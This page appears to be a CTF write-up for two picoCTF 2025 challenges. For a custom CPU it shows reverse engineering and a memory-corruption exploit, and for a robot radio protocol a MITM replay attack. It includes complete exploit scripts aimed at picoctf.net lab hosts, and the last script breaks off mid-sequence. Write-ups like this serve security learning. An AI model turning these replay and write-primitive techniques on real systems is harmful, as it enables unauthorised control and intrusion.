voxal
    • Create new note
    • Create a note from template
      • Sharing URL Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Customize slides
      • Note Permission
      • Read
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Write
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Engagement control Commenting, Suggest edit, Emoji Reply
      • Invitee
    • Publish Note

      Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

      Your note will be visible on your profile and discoverable by anyone.
      Your note is now live.
      This note is visible on your profile and discoverable online.
      Everyone on the web can find and read all notes of this public team.
      See published notes
      Unpublish note
      Please check the box to agree to the Community Guidelines.
      View profile
    • Commenting
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
      • Everyone
    • Suggest edit
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
    • Emoji Reply
    • Enable
    • Versions and GitHub Sync
    • Note settings
    • Engagement control
    • Transfer ownership
    • Delete this note
    • Save as template
    • Insert from template
    • Import from
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
    • Export to
      • Dropbox
      • Google Drive
      • Gist
    • Download
      • Markdown
      • HTML
      • Raw HTML
Menu Note settings Sharing URL Create Help
Create Create new note Create a note from template
Menu
Options
Versions and GitHub Sync Engagement control Transfer ownership Delete this note
Import from
Dropbox Google Drive Gist Clipboard
Export to
Dropbox Google Drive Gist
Download
Markdown HTML Raw HTML
Back
Sharing URL Link copied
/edit
View mode
  • Edit mode
  • View mode
  • Book mode
  • Slide mode
Edit mode View mode Book mode Slide mode
Customize slides
Note Permission
Read
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Write
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Engagement control Commenting, Suggest edit, Emoji Reply
Invitee
Publish Note

Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

Your note will be visible on your profile and discoverable by anyone.
Your note is now live.
This note is visible on your profile and discoverable online.
Everyone on the web can find and read all notes of this public team.
See published notes
Unpublish note
Please check the box to agree to the Community Guidelines.
View profile
Engagement control
Commenting
Permission
Disabled Forbidden Owners Signed-in users Everyone
Enable
Permission
  • Forbidden
  • Owners
  • Signed-in users
  • Everyone
Suggest edit
Permission
Disabled Forbidden Owners Signed-in users Everyone
Enable
Permission
  • Forbidden
  • Owners
  • Signed-in users
Emoji Reply
Enable
Import from Dropbox Google Drive Gist Clipboard
   owned this note    owned this note      
Published Linked with GitHub
1
Subscribed
  • Any changes
    Be notified of any changes
  • Mention me
    Be notified of mention me
  • Unsubscribe
Subscribe
# picoCTF 2025 Writeups ## Pachinko Revisited ### writeup We are given partial source for the remote server, with the source for the CPU missing. Instead we have a wasm binary that executes a single internal cycle of the processor via the exported `process` function. Decompiling the wasm binary in ghidra and inspecting the `process` function shows a few thousand lines of bitwise xors. Given that the `synth_cpu` macro most likely synthesizes verilog output into some rust equivalent, we can assume that this giant block of xors is the compiled verilog code. ```py= bVar17 = state[0x43] state[0x48] = bVar17 ^ 0xff bVar16 = state[0x46] state[0x49] = bVar16 ^ 0xff .... bVar22 = bVar16 & state[0x66] ^ 0xff state[0x47c] = bVar22 bVar22 = bVar22 & bVar30 ``` We can extract this code from ghidra into python since it is all bitwise operators and array indexing. Looking at the server js, we can see a list of the port definitions for the processor: ```javascript= return { clock: getBitFromJson(json, "clock"), addr: getBitsFromJson(json, "addr"), inp_val: getBitsFromJson(json, "inp_val"), out_val: getBitsFromJson(json, "out_val"), reset: getBitFromJson(json, "reset"), write_enable: getBitFromJson(json, "write_enable"), halted: getBitFromJson(json, "halted"), flag: getBitFromJson(json, "flag"), }; ``` We can infer from how the code is splitting the port bits and the size of the memory array that the width of `inp_val`, `out_val`, and `addr` are 16 bits. `clock`, `reset`, `write_enable`, `halted`, and `flag` are all single bit ports. Since verilog requires input or output annotation on ports, you would expect that any input ports used in the CPU would be read from the state array, but never written to. Checking this assumption yield 18 bits of state that are read but never written to: ``` 00 state[0x13] 01 state[0x14] 02 state[0x15] 03 state[0x16] 04 state[0x17] 05 state[0x18] 06 state[0x19] 07 state[0x1a] 08 state[0x1b] 09 state[0x1c] 10 state[0x1d] 11 state[0x1e] 12 state[0x1f] 13 state[0x20] 14 state[0x21] 15 state[0x22] 16 state[0x44] 17 state[2] ``` 16 consecutive bits and 2 standalone bits. This matches up with the expected input ports, `inp_val`, `clock`, and `reset`. The consecutive run of bits is likely to be `inp_val`, while the `clock` and `reset` are unknown. Next we need to determine the offsets of the rest of the ports. Since memory is external the processor will need to fetch each instruction from memory on every cycle. We expect that the `addr` output port will increment by at least 2 on every cycle. We can check this with a script to iterate over all sequences of 16 bits of the state array and look for changes that increment by 2. Here we can also check which offsets of `clock` and `reset` are correct. If we guess `clock` and `reset` wrong, we expect that an increment of 2 will not appear since the clock is not stepping. Checking the 2 possible combinations of `clock` and `reset` shows that the expected increment of 2 only appears with `clk` offset of `0x02` and `reset` offset of `0x44`. The increment also only appears in bits `0x12:0x03`, which is most likely the `addr` output port. Currently known ports look like: ``` 02 - => clk 03 - 12 => addr probably 13 - 22 => inp_val 23 - 32 => ?? 33 - 42 => ?? 43 - => ?? 44 - => reset 45 - => ?? 46 - => ?? ``` This is just enough ports to start executing instructions, since we can respond to memory reads (but not memory writes yet). Taking a look at the 2 provided binaries (`nand_checker.bin` and `flag.bin`) we noticed that they both end in `0x000f`. This is most likely the `halt` instruction, and attempting to execute this instruction confirms this as executing this instruction halts the cpu. From here we just need to figure out what the `out_val` offset is, so we execute the `nand_checker` binary and look at which port (`0x32:0x23` or `0x42:0x33`) outputs values that look like are being written to memory. Running `nand_checker` shows that `0x42:0x33` seems to increment by 4 every instruction, while `0x32:0x23` outputs constants that we know are written to memory. This tells us that `0x42:0x33` is probably the program counter since the instructions are probably 4 bytes wide and `0x32:0x23` is `out_val`. From here since most of the port offsets have been reversed, we can figure out which offsets correspond to `write_enable` and `halt` by running instructions from `nand_checker` and inspecting the behavior of nearby offsets `43`, `45`, `46`, `47`, `48`. Observing the behavior of these bits shows that `46` is most likely `halt` and `45` is most likely `write_enable`. Now that we have all the ports needed to properly run the cpu, we can start reversing the behavior of `nand_checker`. We know that the program is simulating the behavior of `nand` gates, and that certain inputs/outputs are placed at constant addresses in memory. Using this information and our local cpu implementation we start to slowly reverse the behavior of the instructions. ```x86asm ; nand_checker.bin 0x0000 load_imm r4, 0x3000 0x0004 load_imm r5, 0x1000 0x0008 load_imm r6, 0x2000 0x000c load_imm r0, 0x0 0x000e add r0, r4 0x0010 load_imm r2, 0x1000 0x0014 load r1, [r0] 0x0016 add_imm r0, 0x2 0x0018 jmp_if_0 r1, 0x22 0x001a r1 = (r1 < r2) 0x001c jmp_if_0 r1, 0x4c 0x001e load_imm r1, 0x0 0x0020 jmp_if_0 r1, 0x14 0x0022 load r0, [r4] 0x0024 add_imm r4, 0x2 0x0026 load r1, [r4] 0x0028 add_imm r4, 0x2 0x002a load r2, [r4] 0x002c add_imm r4, 0x2 0x002e jmp_if_0 r0, 0x4c 0x0030 jmp_if_0 r1, 0x4c 0x0032 jmp_if_0 r2, 0x4c 0x0034 shl r0, 1 0x0036 shl r1, 1 0x0038 shl r2, 1 0x003a add r0, r6 0x003c add r1, r6 0x003e add r2, r6 0x0040 load r0, [r0] 0x0042 load r1, [r1] 0x0044 nand r0, r1 0x0046 store [r2], r0 0x0048 load_imm r7, 0x0 0x004a jmp_if_0 r7, 0x22 0x004c load r0, [r5] 0x004e load_imm r1, 0xffff 0x0052 load_imm r2, 0x2 0x0054 load_imm r7, 0x0 0x0056 add r5, r2 0x0058 add r6, r2 0x005a load r3, [r5] 0x005c load r4, [r6] 0x005e r3 = (r7 < r3) 0x0060 r4 = (r7 < r4) 0x0062 add r3, r4 0x0064 jmp_if_0 r3, 0x6c 0x0066 r3 = (r3 < r2) 0x0068 jmp_if_0 r3, 0x6c 0x006a jmp_if_0 r7, 0x72 0x006c add r0, r1 0x006e jmp_if_0 r0, 0x7e 0x0070 jmp_if_0 r7, 0x56 0x0072 load_imm r0, 0x3333 0x0076 load_imm r5, 0x1000 0x007a store [r5], r0 0x007c halt 0x007e load_imm r0, 0x1337 0x0082 load_imm r5, 0x1000 0x0086 store [r5], r0 0x0088 halt ``` ```x86asm ; flag.bin 0x0000 load_imm r0, 0x6f73 0x0004 load_imm r1, 0x6563 0x0008 load_imm r2, 0x2e69 0x000c load_imm r3, 0x6f00 0x0010 flag_magic 0x0012 halt ``` Now we can inspect the behavior of `nand_checker`. It reads the circuit node offsets at `0x3000` and validates that each number is less than `0x1000`. Then it performs the actual processing of the input nand circuit and finally checks the input state against the expected output state. In order to get the flag, we need to load magic numbers into registers `r0` through `r3` and execute the `flag_magic` instruction. However the `nand_checker` program never executes the `flag_magic` instruction. Since the program instructions and input/output are all located in the same memory space, the intended solution likely involves overwriting `nand_checker` with a new program that will execute the instructions to set the flag bit. We noticed that while the program validates that the circuit nodes are all less than `0x1000`, it multiplies them by 2 before using them to index the `inputs` array. This means we can modify the circuit nodes at `0x3000` while the program is processing them. Writing `0xfff` to the output node of a nand gate, than inverting it to `0xf000` will generate an offset of `0xe000` when scaled by 2. `0xe000 + 0x2000 & 0xffff == 0x0000`, which lets us modify the instructions of `nand_checker`. From here we just need to patch the `nand r0, r1` instruction to `add r0, r1` which allows us to contruct a 2 byte arbitrary write primitive. From here exploitation is simple. We overwrite the instructions after the nand processing loop with the instructions from `flag.bin`. Once the cpu halts the flag bit will be set and we get the second flag. ### scripts #### solve script ```py= import requests IN1, IN2, IN3, IN4 = range(5, 9) OUT1, OUT2, OUT3, OUT4 = range(1, 5) def con(a: int, b: int, o: int): return { "input1": a, "input2": b, "output": o } def num(n: int, const: int, dest: int): r = [] for b in f"{n:0b}"[1:]: r.append(con(dest, dest, dest)) if b == "1": r.append(con(0 + const, dest, dest)) return r def write(base: int, addr: int, n: int): total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count() total *= 3 const = total + 3 r = [ *num(addr, 0x800 + const, 0x800 + total + 2), *num(n, 0x800 + const, 0x800 + const + 1), con(0xff0, 0x800 + const + 1, 1), con(1, 1, 1), ] return r A = 0 B = A + 6 TARGET = A + 10 * 3 circ= [ con(0xfff, 0xfff, 0xfff), con(0xfff, 0xfff, 0xfff), con(0x22, 0x101, 0x101), con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2), con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2), con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2), con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2), con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0), con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2), con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2), con(0x800 + B + 2, 0x800 + B + 2, 1), ] circ.extend(write(len(circ), 0xf000 + 38, 0x0d)) circ.extend(write(len(circ), 0xf000 + 39, 0x6f73)) circ.extend(write(len(circ), 0xf000 + 40, 0x1d)) circ.extend(write(len(circ), 0xf000 + 41, 0x6563)) circ.extend(write(len(circ), 0xf000 + 42, 0x2d)) circ.extend(write(len(circ), 0xf000 + 43, 0x2e69)) circ.extend(write(len(circ), 0xf000 + 44, 0x3d)) circ.extend(write(len(circ), 0xf000 + 45, 0x6f00)) circ.extend(write(len(circ), 0xf000 + 46, 0x0e)) circ.extend(write(len(circ), 0xf000 + 47, 0x0f)) HOST = "http://activist-birds.picoctf.net:61075/" res = requests.post(f"{HOST}/check", json={ "circuit": circ }) print(res.status_code) print(res.text) print(res.json()) ``` #### readonly/writeonly script ```py= import re prog = open("prog.txt").read() lines = prog.strip().splitlines() reads = [] writes = [] for line in lines: d, s = line.strip().split(" = ") reads.extend(re.findall(r"state\[.+?\]", s)) if d.startswith("state"): writes.append(d) writeonly = set() for w in writes: if w not in reads: o = w.split("[")[1] o = o.split("]")[0] o = int(o, 0) if o > 0x100: continue writeonly.add(w) readonly = set() for r in reads: if f"{r} =" not in prog: readonly.add(r) print(f"READONLY") for i, r in enumerate(sorted(readonly)): print(f"{i+1:02} {r}") print(f"WRITEONLY") for i, r in enumerate(sorted(writeonly)): print(f"{i+1:02} {r}") ``` #### analysis script ```py= from cpu import * import colorama class Machine: def __init__(self): self.state = bytearray([0] * 100_000) self.insns = None self.inputs = None self.outputs = None self.circuit = None self.iters = 0 @property def v(self): return BitView(self.state) def reset(self): run(self.state) self.v[I_RST] = 1 run(self.state) self.v[I_RST] = 0 run(self.state) def save(self): self.saved_state = bytearray(len(self.state)) self.saved_state[:] = self.state self.saved_insns = copy.deepcopy(self.insns) self.saved_inputs = copy.deepcopy(self.inputs) self.saved_outputs = copy.deepcopy(self.outputs) self.saved_iters = self.iters self.saved_circuit = copy.deepcopy(self.circuit) def restore(self): self.state = self.saved_state self.insns = self.saved_insns self.inputs = self.saved_inputs self.outputs = self.saved_outputs self.iters = self.saved_iters self.circuit = self.saved_circuit def step(self, hijack: int = None, show = True): self.iters += 1 self.v[I_CLK] ^= 1 run(self.state) c = self.v[0x02] # clk d = self.v[0x03:0x13] # addr e = self.v[0x13:0x23] # inp val f = self.v[0x23:0x33] # out val g = self.v[0x33:0x43] # pc probably h = self.v[0x43] # ?? i = self.v[0x44] # reset j = self.v[0x45] # write enable k = self.v[0x46] # halt l = self.v[0x47] # flag maybe? m = self.v[0x48] n = self.v[0x49] o = self.v[0x4a] # if j == 1: # if l == 1: # print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o) # break if show: print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", f"pc={g:04x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o) addr = self.v[O_ADDR:O_ADDR+0x10] # assert (addr & 1) == 0, f"{addr:04x}" if self.v[I_CLK] == 0: if self.v[O_WREN] == 1: print(f"writing to {addr:04x}") print([f"{hex(i)}" for i in self.circuit[TARGET-3:TARGET+3]]) if addr >= 0x3000: self.circuit[(addr - 0x3000) >> 1] = self.v[O_DATA:O_DATA+0x10] elif addr >= 0x2000: self.inputs [(addr - 0x2000) >> 1] = self.v[O_DATA:O_DATA+0x10] elif addr >= 0x1000: self.outputs[(addr - 0x1000) >> 1] = self.v[O_DATA:O_DATA+0x10] else: self.insns [(addr - 0x0000) >> 1] = self.v[O_DATA:O_DATA+0x10] # print(f"reading from {addr:04x}") if addr < 0x1000: # print(f"{addr = :#x}") try: self.v[I_DATA:I_DATA+0x10] = hijack or self.insns[addr >> 1] except IndexError: print(f"insn fetch error") return False elif addr >= 0x4000: pass # cases in descending order elif addr >= 0x3000: self.v[I_DATA:I_DATA+0x10] = self.circuit[(addr - 0x3000) >> 1] elif addr >= 0x2000: self.v[I_DATA:I_DATA+0x10] = self.inputs [(addr - 0x2000) >> 1] elif addr >= 0x1000: self.v[I_DATA:I_DATA+0x10] = self.outputs[(addr - 0x1000) >> 1] return not self.v[O_HALT] IN1, IN2, IN3, IN4 = range(5, 9) OUT1, OUT2, OUT3, OUT4 = range(1, 5) def con(a: int, b: int, o: int): return { "input1": a, "input2": b, "output": o } circ = [ con(IN1, IN1, OUT1), con(IN2, IN2, OUT2), con(IN3, IN3, OUT3), con(IN4, IN4, OUT4), ] def num(n: int, const: int, dest: int): r = [] for b in f"{n:0b}"[1:]: r.append(con(dest, dest, dest)) if b == "1": r.append(con(0 + const, dest, dest)) return r def write(base: int, addr: int, n: int): total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count() total *= 3 const = total + 3 r = [ *num(addr, 0x800 + const, 0x800 + total + 2), *num(n, 0x800 + const, 0x800 + const + 1), con(0xff0, 0x800 + const + 1, 1), con(1, 1, 1), ] return r # writes = [ # *num(0x0f) # ] A = 0 B = A + 6 TARGET = A + 10 * 3 circ= [ con(0xfff, 0xfff, 0xfff), con(0xfff, 0xfff, 0xfff), con(0x22, 0x101, 0x101), con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2), con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2), con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2), con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2), con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0), con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2), con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2), con(0x800 + B + 2, 0x800 + B + 2, 1), ] circ.extend(write(len(circ), 0xf000 + 38, 0x0d)) circ.extend(write(len(circ), 0xf000 + 39, 0x6f73)) circ.extend(write(len(circ), 0xf000 + 40, 0x1d)) circ.extend(write(len(circ), 0xf000 + 41, 0x6563)) circ.extend(write(len(circ), 0xf000 + 42, 0x2d)) circ.extend(write(len(circ), 0xf000 + 43, 0x2e69)) circ.extend(write(len(circ), 0xf000 + 44, 0x3d)) circ.extend(write(len(circ), 0xf000 + 45, 0x6f00)) circ.extend(write(len(circ), 0xf000 + 46, 0x0e)) circ.extend(write(len(circ), 0xf000 + 47, 0x0f)) circuit: list[int] = [] for c in circ: circuit.append(c["input1"]) circuit.append(c["input2"]) circuit.append(c["output"]) # circuit = [0xffff, 0xffff, 0xffff] circuit.extend([0] * 0x2000) # pc=001a insn=1712 r0=3002 r1=0001 r2=1000 r3=0000 r4=3000 r5=1000 r6=2000 r7=0000 # pc=0060 insn=4774 r0=0004 r1=ffff r2=0002 r3=0000 r4=0001 r5=1002 r6=2002 r7=0000 A = 0xffff B = 0x0000 inputs = [0] * 5 + [0, 0, 0, 0] + [0] * 0x1000 outputs = [0x0004, 0, 0, 0, 0] + [0] * 0x1000 insns = open("programs/nand_checker.bin", "rb").read() insns = [int.from_bytes(insns[i:i+2], "little") for i in range(0, len(insns), 2)] insns += [0x0f] * 16 import copy def create(): m = Machine() m.insns = copy.copy(insns) m.inputs = copy.copy(inputs) m.outputs = copy.copy(outputs) m.circuit = copy.copy(circuit) return m # m = create() # while m.step(show=True): # pass # exit(1) import pickle regs = [f"r{i}" for i in range(8)] sizes = { 0xd: 4, 0xc: 2, 0x8: 2, 0xb: 2, 0x4: 2, 0x7: 2, 0x1: 2, 0x6: 2, 0x9: 2, 0xf: 2, } try: dump = pickle.load(open("dump.pk", "rb")) except: dump = { 0: {} } prev = {} for reg in regs: prev[reg] = 0 pc = max(dump.keys()) m = create() show = False for i in range(MAX): dump[pc] = {} # m.step() # if m.v[O_HALT] == 1: # break while m.v[O_PC:O_PC+0x10] == pc or (m.v[O_PC:O_PC+0x10] != m.v[O_ADDR:O_ADDR+0x10]): m.step(show=show) if m.v[O_HALT] == 1: print(m.iters) print("done") raise RuntimeError() idx = pc >> 1 size = 0 size = sizes[insns[idx] & 0b1111] new = m.v[O_PC:O_PC+0x10] ib = m.insns[idx:idx+(size>>1)] ib = " ".join(f"{n&0xff:02x}{n>>8:02x}" for n in ib) # print(f"{new = :#x}") # print("DUMPING") for j in range(len(regs)): m.save() reg = regs[j] if reg not in dump[pc]: insn = 0b1011 | (j << 3) | (j << 8) m.v[I_DATA:I_DATA+0x10] = insn m.step(hijack=insn, show=False) try: m.step(hijack=insn, show=False) except: pass dump[pc][reg] = m.v[O_ADDR:O_ADDR+16] m.restore() pass coloring = [reg not in prev or prev[reg] != dump[pc][reg] for reg in regs] regdump = [f"{r}={dump[pc][r]:04x}" for r in regs] regdump = [f"{colorama.Fore.LIGHTRED_EX}{r}{colorama.Fore.RESET}" if c else r for (c, r) in zip(coloring, regdump)] regdump = " ".join(regdump) print(f"{pc=:04x} insn={ib:<9} {regdump}") # print("DONE") prev = dump[pc] pc = new ``` #### disassembler script ```py= import io import sys def split_upper(upper: int): return (upper & 0xf), (upper >> 4) & 0xf class Diassem: def __init__(self, bytes): self.b = io.BytesIO(bytes) def read_op_regs(self): bt = self.b.read(2) if len(bt) < 2: raise Exception("out of instructions") op = bt[0] & 0xf reg1 = (bt[0] >> 4) & 0xf return op, reg1, bt[1] def disassem(self): out = [] try: lut = [ self.read_0, # 0 self.read_1, # 1 self.read_stub, # 2 self.read_stub, # 3 self.read_4, # 4 self.read_stub, # 5 self.read_6, # 6 self.read_7, # 7 self.read_8, # 8 self.read_9, # 9 self.read_stub, # a self.read_b, # b self.read_c, # c self.read_d, # d self.read_e, # e self.read_f, # f ] while True: op, reg1, upper = self.read_op_regs() out.append(f"0x{(self.b.tell() - 2):04x}\t" + lut[op](op, reg1, upper)) except Exception as e: print(e) finally: print("\n".join(out)) def read_stub(self, op, reg1, reg2): return f"??? {op} r{reg1} {reg2}" def read_0(self, op, reg1, upper): return f"nop" def read_1(self, op,reg1, upper): # owen insisted if reg1 == upper: return f"shl r{reg1}, 1" return f"add r{reg1}, r{upper}" def read_4(self, op, reg1, upper): return f"add_imm r{reg1}, {hex(upper)}" def read_6(self, op, reg1, upper): return f"nand r{reg1}, r{upper}" def read_7(self, op, reg1, upper): reg2, reg3 = split_upper(upper) return f"r{reg1} = (r{reg3} < r{reg2})" def read_8(self, op, reg1, upper): return f"load_imm r{reg1}, {hex(upper)}" def read_9(self, op, reg1, reg2): return f"store [r{reg1}], r{reg2}" def read_b(self, op, reg1, reg2): return f"load r{reg1}, [r{reg2}]" def read_c(self, op, reg1, addr): return f"jmp_if_0 r{reg1}, {hex(addr)}" def read_d(self, op, reg1, reg2): imm = int.from_bytes(self.b.read(2), "little") return f"load_imm r{reg1}, {hex(imm)}" def read_e(self, op, reg1, upper): return "flag_magic" def read_f(self, op, reg1, reg2): return f"halt {'(strange)' if reg1 or reg1 else ''}" file = open(sys.argv[1], "rb").read() dis = Diassem(file) dis.disassem() ``` ## Ricochet 1. Notice that changing the address of the controller allows you to MITM the robot -> controller channel 2. Notice that the nonce resets, and that you can reuse the packets that were previously played to make the robot do things without the controller's consent. 3. Notice that sending back the secure_data_request packet to the robot allows the nonce to be incremented without doing anything (not included in the 20 move limit). Using all this, we can painstakingly put together a hand made solve script to get the flag. It only works some of the time because of certain race conditions with changing the controller's address. ### solve script ```py= from asyncio import wait_for import requests import time import json import copy from pwn import log, sleep """ original RC addr is 16 new RC addr is 0 robot addr is 32 ack and request have empty bodies """ TYPE = "msg_type" DST = "dst" SRC = "src" RC = 16 BOT = 32 ME = 1 MSG = "message" ENC = "encrypted" SERVER_URL = "http://activist-birds.picoctf.net:51576/" y = input("reuse? ") if y.lower() in ["y" or "yes"]: ALL = json.load(open("radio_rx.json", "r")) else: req = requests.get(SERVER_URL + "/radio_rx") print(f"{req.status_code = }") ALL = json.loads(req.text) with open("radio_rx.json", "w+") as fp: json.dump(ALL, fp) secure_data = {} secure_data_response = {} secure_data_ack = {} secure_data_request = {} controller_nonce = 0 robot_nonce = 0 for i in ALL: if i['msg_type'] == 'secure_data': i['dst'] = '0' secure_data[robot_nonce] = i robot_nonce += 1 if i['msg_type'] == 'secure_data_response': secure_data_response[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_ack': secure_data_ack[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_request': i['dst'] = '0' secure_data_request[robot_nonce] = i robot_nonce += 1 # Returns a list of messages seen on the air since the last time this function # was called def receive_radio_messages(): messages = requests.get(SERVER_URL+"/radio_rx").json() for msg in messages: log.info(f"Received message: {msg}") return messages def wait_for_radio_message(type: str): all = [] while True: msgs = receive_radio_messages() all.extend(msgs) for msg in msgs: if msg["msg_type"] == type: log.info(f"FOUND MSG OF TYPE {type}") return all # [message] argument should be a Python dict object def inject_radio_message(message, msg_type = None, dst = None, src = None, show = False): message = copy.deepcopy(message) if msg_type is not None: message[TYPE] = msg_type if dst is not None: message[DST] = dst if src is not None: message[SRC] = src if show: log.info(f"injecting: {message}") requests.post(SERVER_URL+"/radio_tx", json=message) def start_robot(): requests.get(SERVER_URL+"/start") def stop_robot(): requests.get(SERVER_URL+"/stop") def get_board_state(): return requests.get(SERVER_URL+"/state").json() start_robot() wait_for_radio_message("debug") inject_radio_message({"msg_type": "set_addr", "dst": 16, "src": 1, "new_addr": 0}) a = wait_for_radio_message("secure_data")[-1] log.info(f"got a = {a.get(ENC)[:16]}") inject_radio_message(secure_data_ack[2], dst=BOT) bot_nonce = 3 rc_nonce = 2 wait_for_radio_message("secure_data_request") for _ in range(10): if bot_nonce % 2 == 1: bot_msg = secure_data_request[bot_nonce] else: bot_msg = secure_data_ack[bot_nonce] inject_radio_message(bot_msg, dst=BOT, msg_type="secure_data_response") wait_for_radio_message("secure_data_request") if rc_nonce % 2 == 1: inject_radio_message(secure_data_request[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_response") else: inject_radio_message(secure_data[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_ack") log.info("incremented BOT and RC") bot_nonce += 1 rc_nonce += 1 log.info(f"BOT nonce is now {bot_nonce}") log.info(f"RC nonce is not {rc_nonce}") # BOT is still waiting for secure_data_response # RC is idling inject_radio_message(secure_data[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_ack") rc_nonce += 1 # rc nonce is now 13 inject_radio_message({ TYPE: "set_addr", DST: 0, SRC: 1, "new_addr": 16 }) wait_for_radio_message("ack_set_addr") inject_radio_message(secure_data_request[bot_nonce], dst=16, src=32) rc_nonce += 1 # rc nonce is now 14 # high nonces should start at 14 now high = [] for i in range(19): print(i) high.extend(wait_for_radio_message("secure_data_response")) log.info(f"ignoring {high[0]}") high = high[1:] with open("high.json", "w+") as fp: json.dump(high, fp) # sleep(10) # a = receive_radio_messages()[-1] # sleep(.5) log.info("should be done") robot_nonce = 14 controller_nonce = 14 for i in high: if i['msg_type'] == 'secure_data': i['dst'] = '0' secure_data[robot_nonce] = i robot_nonce += 1 if i['msg_type'] == 'secure_data_response': secure_data_response[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_ack': secure_data_ack[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_request': i['dst'] = '0' secure_data_request[robot_nonce] = i robot_nonce += 1 log.info(f"done assigning high nonces") start_robot() wait_for_radio_message("debug") inject_radio_message({"msg_type": "set_addr", "dst": "16", "src":"1", "new_addr": "0"}) a = wait_for_radio_message("secure_data")[-1] log.info(f"got a = {a.get(ENC)[:16]}") inject_radio_message(secure_data_ack[2], dst=BOT) """ THING """ wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[3], dst=BOT, msg_type="secure_data_response") # now we're at nonce 4 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[4], dst=BOT) # now we're at nonce 5 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[5], dst=BOT, msg_type="secure_data_response") # now we're at nonce 6 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[6], dst=BOT, msg_type="secure_data_response") # now we're at nonce 7 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[7], dst=BOT, msg_type="secure_data_response") # now we're at nonce 8 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[8], dst=BOT, msg_type="secure_data_response") # now we're at nonce 9 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[9], dst=BOT) # now we're at nonce 10 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[10], dst=BOT) # now we're at nonce 11 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[11], dst=BOT, msg_type="secure_data_response") # now we're at nonce 12 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[12], dst=BOT, msg_type="secure_data_response") # now we're at nonce 13 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[13], dst=BOT, msg_type="secure_data_response") # now we're at nonce 14 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[14], dst=BOT, msg_type="secure_data_response") # now we're at nonce 15 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[15], dst=BOT) # now we're at nonce 16 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[16], dst=BOT) # now we're at nonce 17 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[17], dst=BOT, msg_type="secure_data_response") # now we're at nonce 18 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[18], dst=BOT, msg_type="secure_data_response") # now we're at nonce 19 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[19], dst=BOT, msg_type="secure_data_response") # now we're at nonce 20 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[20], dst=BOT, msg_type="secure_data_response") # now we're at nonce 21 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[21], dst=BOT) # now we're at nonce 22 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[22], dst=BOT) # now we're at nonce 23 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[23], dst=BOT, msg_type="secure_data_response") # now we're at nonce 24 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[24], dst=BOT, msg_type="secure_data_response") # now we're at nonce 25 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[25], dst=BOT, msg_type="secure_data_response") # now we're at nonce 26 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[26], dst=BOT, msg_type="secure_data_response") # now we're at nonce 27 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[27], dst=BOT) # now we're at nonce 28 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[28], dst=BOT) # now we're at nonce 29 wait_for_radio_message("secure_data_request") 